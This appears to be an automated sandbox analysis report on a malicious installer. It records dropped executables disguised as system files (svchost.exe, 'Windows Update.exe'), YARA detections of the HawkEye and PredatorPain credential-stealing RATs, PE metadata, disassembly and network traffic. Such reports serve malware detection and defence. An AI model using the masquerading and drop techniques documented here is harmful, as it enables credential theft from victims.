                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                    Process:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):47
                                                                    Entropy (8bit):4.296728947874153
                                                                    Encrypted:false
                                                                    SSDEEP:3:oNWXp5cViE2J5xAIVJBUA:oNWXp+N23fVJBUA
                                                                    MD5:B5A38E1E1187076DD0FF50A0F366A697
                                                                    SHA1:6B5FE1C661D1EBFBCC10AEE318508A2FB9F5ACC7
                                                                    SHA-256:81F0716C0370690C4BAA4624AA49C1E755FFE9D341F61C457EFAC3837CD14B3D
                                                                    SHA-512:E3AAAEF247D18D1B65362C764B53291DA8E73E7058122D9B4D5F3343D79C88C6A2E6D6786D8AB518C41D7737C3DD73B4BC2F23E4B01C59AFAEE9C1AB21F94539
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):724480
                                                                    Entropy (8bit):6.369212575152287
                                                                    Encrypted:false
                                                                    SSDEEP:12288:lBQtqB5urTIoYWBQk1E+VF9mOx9TdnHx:lBQtqBorTlYWBhE+V3mO7L
                                                                    MD5:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    SHA1:419AB2F062AEB985DB1F11D44EE6C0177F7E59A9
                                                                    SHA-256:4F21D6AF6EACAE330AE755BF05739C7D8D61567CDCD3F3FF3AD57EF714D8B932
                                                                    SHA-512:8B91940041EAF7271E23BFDAF1A8F0A5C12CB9DA5D179686FD179C65F371B7FB1D1567AFF80B9EE0060A22EBBBB280E9301930B8EFB549FDD6DB01657D33AA92
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................<........... ........@.. .......................`............@.....................................W........8...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....8.......:..................@..@.reloc.......@......................@..B........................H........i..............\m..X............................................0..........(....(.......(.....o....*......................(......o......o......o......o....*...F.(....o....o....*....(....*.s.........s.........s.........s.........s.........*.0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............{....(...+}.....{....*...{....3.*.,.r...ps....z..|....o...+*...0................,.........o....9..
                                                                    C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.5317531123948465
                                                                    Encrypted:false
                                                                    SSDEEP:768:OGjo7j58ODEYBhzjYBUbBBcJJJB4JnE2rVJjRHNIRFqdXrZjBEwnn:OGU7j58OdZOID8L2E2XbIRFqBrcon
                                                                    MD5:A273A781070D239BA99D3FD8EF341E6C
                                                                    SHA1:650FC260C3CBC8FDB37BD18AFCFA089AA2132B96
                                                                    SHA-256:92EC56AE1720E4B05078BB970C4655904CC61BA11FD13482D1B234504589DF2B
                                                                    SHA-512:A37F71BE8362822018A348F84D41F2549F57B2EC310FAF8086637F0E83D03FBBB2A8E71C6299F535A4CBB01A1E81CBCAE8801EC8DDD0622A80A134C8455F96A2
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2*a..................... ......^.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\taskhost.exe
                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):533504
                                                                    Entropy (8bit):6.505015338372517
                                                                    Encrypted:false
                                                                    SSDEEP:6144:gmuQqyCAobS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnxX:cAoQtqB5urTIoYWBQk1E+VF9mOx9si
                                                                    MD5:83827B8CFFE67A789B03E342ED3B1572
                                                                    SHA1:E4CD65C315D7C4C37A89767E11F9C52D64753D0F
                                                                    SHA-256:029910F3FC7C1BC1DAA32A70BD334CCC767E7A0D0BDC011881099C9507ADB3B6
                                                                    SHA-512:8AB193F75C224208A54DB6BFAA2325F34AF9CDF29C67E01F1CE492D36696E2F6ADEB54D18060D2ECD2F5FF6A8794E399D633556446C25ED50A9363460E88EEB6
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................6........... ........@.. ....................................@.................................d...W.... ..R3...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...R3... ...4..................@..@.reloc.......`......."..............@..B........................H.......0}..4..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.5317531123948465
                                                                    Encrypted:false
                                                                    SSDEEP:768:OGjo7j58ODEYBhzjYBUbBBcJJJB4JnE2rVJjRHNIRFqdXrZjBEwnn:OGU7j58OdZOID8L2E2XbIRFqBrcon
                                                                    MD5:A273A781070D239BA99D3FD8EF341E6C
                                                                    SHA1:650FC260C3CBC8FDB37BD18AFCFA089AA2132B96
                                                                    SHA-256:92EC56AE1720E4B05078BB970C4655904CC61BA11FD13482D1B234504589DF2B
                                                                    SHA-512:A37F71BE8362822018A348F84D41F2549F57B2EC310FAF8086637F0E83D03FBBB2A8E71C6299F535A4CBB01A1E81CBCAE8801EC8DDD0622A80A134C8455F96A2
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2*a..................... ......^.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):724480
                                                                    Entropy (8bit):6.369212575152287
                                                                    Encrypted:false
                                                                    SSDEEP:12288:lBQtqB5urTIoYWBQk1E+VF9mOx9TdnHx:lBQtqBorTlYWBhE+V3mO7L
                                                                    MD5:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    SHA1:419AB2F062AEB985DB1F11D44EE6C0177F7E59A9
                                                                    SHA-256:4F21D6AF6EACAE330AE755BF05739C7D8D61567CDCD3F3FF3AD57EF714D8B932
                                                                    SHA-512:8B91940041EAF7271E23BFDAF1A8F0A5C12CB9DA5D179686FD179C65F371B7FB1D1567AFF80B9EE0060A22EBBBB280E9301930B8EFB549FDD6DB01657D33AA92
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................<........... ........@.. .......................`............@.....................................W........8...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....8.......:..................@..@.reloc.......@......................@..B........................H........i..............\m..X............................................0..........(....(.......(.....o....*......................(......o......o......o......o....*...F.(....o....o....*....(....*.s.........s.........s.........s.........s.........*.0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............{....(...+}.....{....*...{....3.*.,.r...ps....z..|....o...+*...0................,.........o....9..
                                                                    C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\taskhost.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):533504
                                                                    Entropy (8bit):6.505015338372517
                                                                    Encrypted:false
                                                                    SSDEEP:6144:gmuQqyCAobS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnxX:cAoQtqB5urTIoYWBQk1E+VF9mOx9si
                                                                    MD5:83827B8CFFE67A789B03E342ED3B1572
                                                                    SHA1:E4CD65C315D7C4C37A89767E11F9C52D64753D0F
                                                                    SHA-256:029910F3FC7C1BC1DAA32A70BD334CCC767E7A0D0BDC011881099C9507ADB3B6
                                                                    SHA-512:8AB193F75C224208A54DB6BFAA2325F34AF9CDF29C67E01F1CE492D36696E2F6ADEB54D18060D2ECD2F5FF6A8794E399D633556446C25ED50A9363460E88EEB6
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................6........... ........@.. ....................................@.................................d...W.... ..R3...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...R3... ...4..................@..@.reloc.......`......."..............@..B........................H.......0}..4..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                    C:\Users\user\AppData\Roaming\pid.txt
                                                                    Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):2.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:C7:C7
                                                                    MD5:2E6D9C6052E99FCDFA61D9B9DA273CA2
                                                                    SHA1:33C6272DF8483166FFB4295472824F971762E64A
                                                                    SHA-256:B7B598D56A5096E61D7B35CC791EA1E21484BDD778FB8A2EBC52E1045E8255B9
                                                                    SHA-512:A37EE8D831141574064DB582050E33DD2E8846E901E6477BF7C5B7440A407B1E49166736E4C6BFBF0BD12AE68D805C7DC81DB10D661E7F72F59464209D4AD305
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 5204
                                                                    C:\Users\user\AppData\Roaming\pidloc.txt
                                                                    Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):49
                                                                    Entropy (8bit):4.441568140944513
                                                                    Encrypted:false
                                                                    SSDEEP:3:oNWXp5cViEaKC59KYr4a:oNWXp+NaZ534a
                                                                    MD5:6078085422A31D60FCEB24D4FA24B6E8
                                                                    SHA1:0CD056478F3D877B3D44C7B439485B1ACFD78F5A
                                                                    SHA-256:9113E6728CEB1F460E3CEAB19852A31602CD77A92E7B861802FE339FD5CFD837
                                                                    SHA-512:22CE5D96BB25519CB14F27BDB44D7FAEDC6D5C8B8F81A1F972EA638BF9731D8793C98359D7C9476D50AF46346E0964E82F5B0B2F8B1B6763B078D2B045FB2EA1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.98493346971263
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:aaVb1xEmrd.exe
                                                                    File size:835015
                                                                    MD5:c428b176eca6b17cda3f5729abaddf0b
                                                                    SHA1:65262ee5ea9c832436c6eba4a5e58d69900aea72
                                                                    SHA256:b139dd73d811c0d20602ebd74f962724d2c9e31958bdea9326473bf4bbd746b9
                                                                    SHA512:fc6ec90e224a9af1fb1d996bd4067c7f8f00749840fa7c2c446fc6c6a7c158bfcfb913b96b8586d73a41a80bd107690c50fb0c50e1cef43cad8ca6cba1cda886
                                                                    SSDEEP:24576:UA892H+rl3WuNI3jhCXkqzp/GAqDF+Q0o:nQM+D6zhCUg9GNDF+c
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L....y.F.................\.........

                                                                    File Icon

                                                                    Icon Hash:30b278e8d4d49633

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40315d
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x460E79C3 [Sat Mar 31 15:09:55 2007 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:4d17be67c8d0394c5c1b8e725359ed89

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000180h
                                                                    push ebx
                                                                    push esi
                                                                    xor ebx, ebx
                                                                    push edi
                                                                    mov dword ptr [ebp-0Ch], ebx
                                                                    mov dword ptr [ebp-08h], 00409230h
                                                                    mov dword ptr [ebp-04h], ebx
                                                                    mov byte ptr [ebp-14h], 00000020h
                                                                    call dword ptr [00407030h]
                                                                    push ebx
                                                                    call dword ptr [00407270h]
                                                                    mov dword ptr [0042F0D0h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [ebp-00000180h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 00429440h
                                                                    call dword ptr [00407154h]
                                                                    push 00409224h
                                                                    push 0042E820h
                                                                    call 00007FC228BE8D23h
                                                                    call dword ptr [004070B0h]
                                                                    mov esi, 00435000h
                                                                    push eax
                                                                    push esi
                                                                    call 00007FC228BE8D11h
                                                                    push ebx
                                                                    call dword ptr [00407108h]
                                                                    cmp byte ptr [00435000h], 00000022h
                                                                    mov dword ptr [0042F020h], eax
                                                                    mov eax, esi
                                                                    jne 00007FC228BE653Bh
                                                                    mov byte ptr [ebp-14h], 00000022h
                                                                    mov eax, 00435001h
                                                                    push dword ptr [ebp-14h]
                                                                    push eax
                                                                    call 00007FC228BE880Ch
                                                                    push eax
                                                                    call dword ptr [00407210h]
                                                                    mov dword ptr [ebp-10h], eax
                                                                    jmp 00007FC228BE6594h
                                                                    cmp cl, 00000020h
                                                                    jne 00007FC228BE6538h
                                                                    inc eax
                                                                    cmp byte ptr [eax], 00000020h
                                                                    je 00007FC228BE652Ch
                                                                    cmp byte ptr [eax], 00000022h
                                                                    mov byte ptr [ebp-14h], 00000020h
                                                                    jne 00007FC228BE6537h
                                                                    inc eax
                                                                    mov byte ptr [ebp-14h], 00000022h
                                                                    cmp byte ptr [eax], 0000002Fh
                                                                    jne 00007FC228BE6567h
                                                                    inc eax
                                                                    cmp byte ptr [eax], 00000053h
                                                                    jne 00007FC228BE6541h
                                                                    mov cl, byte ptr [eax+01h]

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74480xb4.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x1488.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x5bba0x5c00False0.676672894022data6.47700627279IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x70000x11f00x1200False0.466796875data5.2756827095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x90000x260d40x400False0.650390625data5.15843208882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x380000x14880x1600False0.330965909091data3.37907638684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x381480x10a8dataEnglishUnited States
                                                                    RT_DIALOG0x391f00x100dataEnglishUnited States
                                                                    RT_DIALOG0x392f00x11cdataEnglishUnited States
                                                                    RT_DIALOG0x394100x60dataEnglishUnited States
                                                                    RT_GROUP_ICON0x394700x14dataEnglishUnited States

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CopyFileA, CloseHandle, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, MulDiv, ReadFile, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, ExitProcess
                                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, RegisterClassA, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, wsprintfA
                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    09/06/21-11:22:25.883661TCP1201ATTACK-RESPONSES 403 Forbidden8049712104.16.154.36192.168.2.3
                                                                    09/06/21-11:22:33.904181TCP1201ATTACK-RESPONSES 403 Forbidden8049715104.16.154.36192.168.2.3

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 6, 2021 11:22:24.544179916 CEST49711587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:24.598454952 CEST5874971194.100.180.160192.168.2.3
